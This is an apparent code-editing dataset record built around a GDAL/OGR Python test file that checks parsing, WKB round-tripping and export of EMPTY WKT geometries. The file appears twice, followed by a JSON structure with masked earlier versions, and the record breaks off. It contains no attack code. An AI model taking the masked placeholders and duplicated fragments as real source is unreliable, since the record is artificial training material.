        IsEmpty (older bindings).
        """
        try:
            ogr.Geometry.IsEmpty
        except AttributeError:
            # Narrowed from a bare except: only the missing-attribute case
            # should trigger a skip, not e.g. KeyboardInterrupt.
            return 'skip'

        if geom.IsEmpty() == False:
            geom.Destroy()
            gdaltest.post_reason(
                'IsEmpty returning false for an empty geometry')
            return 'fail'

        return 'success'

    def CheckIsEmpty(self):
        """Parse self.inString; check WKB round-trip, exported WKT and emptiness."""
        geom = ogr.CreateGeometryFromWkt(self.inString)
        wkt = geom.ExportToWkt()

        if self.expectedOutString != 'POINT EMPTY':
            # Round-trip through WKB must reproduce the same WKT.
            # POINT EMPTY is excluded — presumably it has no portable WKB
            # form; TODO confirm against the OGC SFA spec.
            if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
                    ) != wkt:
                return 'fail'

        if wkt == self.expectedOutString:
            if self.isEmpty(geom) == 'fail':
                return 'fail'
            return 'success'
        gdaltest.post_reason('WKT is wrong: ' + wkt +
            '. Expected value is: ' + self.expectedOutString)
        return 'fail'
# (input WKT, canonical WKT expected back from ExportToWkt()) pairs,
# covering each geometry type in both the parenthesised and the bare
# EMPTY spelling.
empty_wkt_list = [
    ('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),
    ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'),
    ('MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'),
    ('MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'),
    ('POINT ( EMPTY )', 'POINT EMPTY'),
    ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'),
    ('POLYGON ( EMPTY )', 'POLYGON EMPTY'),
    ('GEOMETRYCOLLECTION EMPTY', 'GEOMETRYCOLLECTION EMPTY'),
    ('MULTIPOLYGON EMPTY', 'MULTIPOLYGON EMPTY'),
    ('MULTILINESTRING EMPTY', 'MULTILINESTRING EMPTY'),
    ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'),
    ('POINT EMPTY', 'POINT EMPTY'),
    ('LINESTRING EMPTY', 'LINESTRING EMPTY'),
    ('POLYGON EMPTY', 'POLYGON EMPTY'),
]
def ogr_wktempty_test_partial_empty_geoms():
    """Check that empty sub-geometries added to a container geometry are
    ignored when the container is exported to WKT.

    Returns 'success' or 'fail' (gdaltest convention).
    """

    def check(geom, expected_wkt):
        # Shared check: report and return 'fail' if the export mismatches.
        if geom.ExportToWkt() != expected_wkt:
            gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
                '. Expected value is: ' + expected_wkt)
            return 'fail'
        return 'success'

    # Multipoint with a valid point and an empty point.
    wkt = 'MULTIPOINT (1 1)'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipoint with an empty point followed by a valid point.
    geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
    geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
    if check(geom, 'MULTIPOINT (1 1)') != 'success':
        return 'fail'

    # Multilinestring with a valid linestring and an empty linestring.
    wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multilinestring with an empty linestring followed by a valid one.
    geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
    geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
    if check(geom, 'MULTILINESTRING ((0 1,2 3,4 5,0 1))') != 'success':
        return 'fail'

    # Polygon with a valid external ring and an empty internal ring.
    wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Polygon with an empty external ring and a valid internal ring:
    # the polygon still exports as POLYGON EMPTY.
    wkt = 'POLYGON EMPTY'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
    ring = ogr.Geometry(type=ogr.wkbLinearRing)
    ring.AddPoint_2D(0, 0)
    ring.AddPoint_2D(10, 0)
    ring.AddPoint_2D(10, 10)
    ring.AddPoint_2D(0, 10)
    ring.AddPoint_2D(0, 0)
    geom.AddGeometry(ring)
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipolygon with a valid polygon and an empty polygon.
    wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipolygon with an empty polygon followed by a valid polygon.
    geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
    geom.AddGeometry(ogr.CreateGeometryFromWkt(
        'POLYGON ((100 0,100 10,110 10,100 0))'))
    if check(geom, 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))') != 'success':
        return 'fail'

    return 'success'
# Build the gdaltest test list: one CheckIsEmpty test per WKT pair, plus
# the partial-empty-geometry test.
gdaltest_list = []
for in_wkt, expected_wkt in empty_wkt_list:
    helper = TestWktEmpty(in_wkt, expected_wkt)
    gdaltest_list.append((helper.CheckIsEmpty, in_wkt))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
    gdaltest.setup_run('ogr_wktempty')
    gdaltest.run_tests(gdaltest_list)
    gdaltest.summarize()
<|reserved_special_token_1|>
#!/usr/bin/env python
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test support for the various "EMPTY" WKT geometry representations.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2004, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008, Even Rouault <even dot rouault at mines-paris dot org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
###############################################################################
import os
import sys
import string
sys.path.append( '../pymod' )
import gdaltest
import ogrtest
from osgeo import ogr
from osgeo import gdal
class TestWktEmpty:
    """Test helper: verify that a WKT string parses and exports back as the
    expected canonical "EMPTY" representation, and that the parsed geometry
    reports itself as empty.
    """

    def __init__(self, inString, expectedOutString):
        # WKT to feed to the parser, and the canonical WKT expected back
        # from ExportToWkt().
        self.inString = inString
        self.expectedOutString = expectedOutString

    def isEmpty(self, geom):
        """Return 'success' if *geom* reports IsEmpty(), 'fail' otherwise.

        Returns 'skip' when the bound ogr.Geometry class does not expose
        IsEmpty (older bindings).
        """
        try:
            ogr.Geometry.IsEmpty
        except AttributeError:
            # Narrowed from a bare except: only the missing-attribute case
            # should trigger a skip, not e.g. KeyboardInterrupt.
            return 'skip'

        if geom.IsEmpty() == False:
            geom.Destroy()
            gdaltest.post_reason("IsEmpty returning false for an empty geometry")
            return 'fail'

        return 'success'

    def CheckIsEmpty(self):
        """Parse self.inString; check WKB round-trip, exported WKT and emptiness."""
        geom = ogr.CreateGeometryFromWkt(self.inString)
        wkt = geom.ExportToWkt()

        if self.expectedOutString != 'POINT EMPTY':
            # Round-trip through WKB must reproduce the same WKT.
            # POINT EMPTY is excluded — presumably it has no portable WKB
            # form; TODO confirm against the OGC SFA spec.
            if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt() != wkt:
                return 'fail'

        if wkt == self.expectedOutString:
            if self.isEmpty(geom) == 'fail':
                return 'fail'
            return 'success'
        gdaltest.post_reason('WKT is wrong: ' + wkt + '. Expected value is: ' + self.expectedOutString)
        return 'fail'
# (input WKT, canonical WKT expected back from ExportToWkt()) pairs,
# covering each geometry type in both the parenthesised and the bare
# EMPTY spelling.
empty_wkt_list = [
    ('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),
    ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'),
    ('MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'),
    ('MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'),
    ('POINT ( EMPTY )', 'POINT EMPTY'),
    ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'),
    ('POLYGON ( EMPTY )', 'POLYGON EMPTY'),
    ('GEOMETRYCOLLECTION EMPTY', 'GEOMETRYCOLLECTION EMPTY'),
    ('MULTIPOLYGON EMPTY', 'MULTIPOLYGON EMPTY'),
    ('MULTILINESTRING EMPTY', 'MULTILINESTRING EMPTY'),
    ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'),
    ('POINT EMPTY', 'POINT EMPTY'),
    ('LINESTRING EMPTY', 'LINESTRING EMPTY'),
    ('POLYGON EMPTY', 'POLYGON EMPTY'),
]
def ogr_wktempty_test_partial_empty_geoms():
    """Check that empty sub-geometries added to a container geometry are
    ignored when the container is exported to WKT.

    Returns 'success' or 'fail' (gdaltest convention).
    """

    def check(geom, expected_wkt):
        # Shared check: report and return 'fail' if the export mismatches.
        if geom.ExportToWkt() != expected_wkt:
            gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
                '. Expected value is: ' + expected_wkt)
            return 'fail'
        return 'success'

    # Multipoint with a valid point and an empty point.
    wkt = 'MULTIPOINT (1 1)'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipoint with an empty point followed by a valid point.
    geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
    geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
    if check(geom, 'MULTIPOINT (1 1)') != 'success':
        return 'fail'

    # Multilinestring with a valid linestring and an empty linestring.
    wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multilinestring with an empty linestring followed by a valid one.
    geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
    geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
    if check(geom, 'MULTILINESTRING ((0 1,2 3,4 5,0 1))') != 'success':
        return 'fail'

    # Polygon with a valid external ring and an empty internal ring.
    wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Polygon with an empty external ring and a valid internal ring:
    # the polygon still exports as POLYGON EMPTY.
    wkt = 'POLYGON EMPTY'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
    ring = ogr.Geometry(type=ogr.wkbLinearRing)
    ring.AddPoint_2D(0, 0)
    ring.AddPoint_2D(10, 0)
    ring.AddPoint_2D(10, 10)
    ring.AddPoint_2D(0, 10)
    ring.AddPoint_2D(0, 0)
    geom.AddGeometry(ring)
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipolygon with a valid polygon and an empty polygon.
    wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
    geom = ogr.CreateGeometryFromWkt(wkt)
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
    if check(geom, wkt) != 'success':
        return 'fail'

    # Multipolygon with an empty polygon followed by a valid polygon.
    geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
    geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
    geom.AddGeometry(ogr.CreateGeometryFromWkt(
        'POLYGON ((100 0,100 10,110 10,100 0))'))
    if check(geom, 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))') != 'success':
        return 'fail'

    return 'success'
# Build the gdaltest test list: one CheckIsEmpty test per WKT pair, plus
# the partial-empty-geometry test.
gdaltest_list = []
for in_wkt, expected_wkt in empty_wkt_list:
    helper = TestWktEmpty(in_wkt, expected_wkt)
    gdaltest_list.append((helper.CheckIsEmpty, in_wkt))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
    gdaltest.setup_run('ogr_wktempty')
    gdaltest.run_tests(gdaltest_list)
    gdaltest.summarize()
|
flexible
|
{
"blob_id": "1ef1dcc8fdf4d813dad70c860e33778715d51b0c",
"index": 1575,
"step-1": "<mask token>\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\n<mask token>\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append('../pymod')\n<mask token>\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\n<mask token>\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\n<mask token>\nfor item in empty_wkt_list:\n ut = TestWktEmpty(item[0], item[1])\n gdaltest_list.append((ut.CheckIsEmpty, item[0]))\ngdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)\nif __name__ == '__main__':\n gdaltest.setup_run('ogr_wktempty')\n gdaltest.run_tests(gdaltest_list)\n gdaltest.summarize()\n",
"step-3": "<mask token>\nsys.path.append('../pymod')\n<mask token>\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\nempty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (\n 'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (\n 'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',\n 'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (\n 'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',\n 'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',\n 'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',\n 'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (\n 'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),\n ('POLYGON EMPTY', 'POLYGON EMPTY')]\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\ngdaltest_list = []\nfor item in empty_wkt_list:\n ut = TestWktEmpty(item[0], item[1])\n gdaltest_list.append((ut.CheckIsEmpty, item[0]))\ngdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)\nif __name__ == '__main__':\n gdaltest.setup_run('ogr_wktempty')\n gdaltest.run_tests(gdaltest_list)\n gdaltest.summarize()\n",
"step-4": "import os\nimport sys\nimport string\nsys.path.append('../pymod')\nimport gdaltest\nimport ogrtest\nfrom osgeo import ogr\nfrom osgeo import gdal\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\nempty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (\n 'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (\n 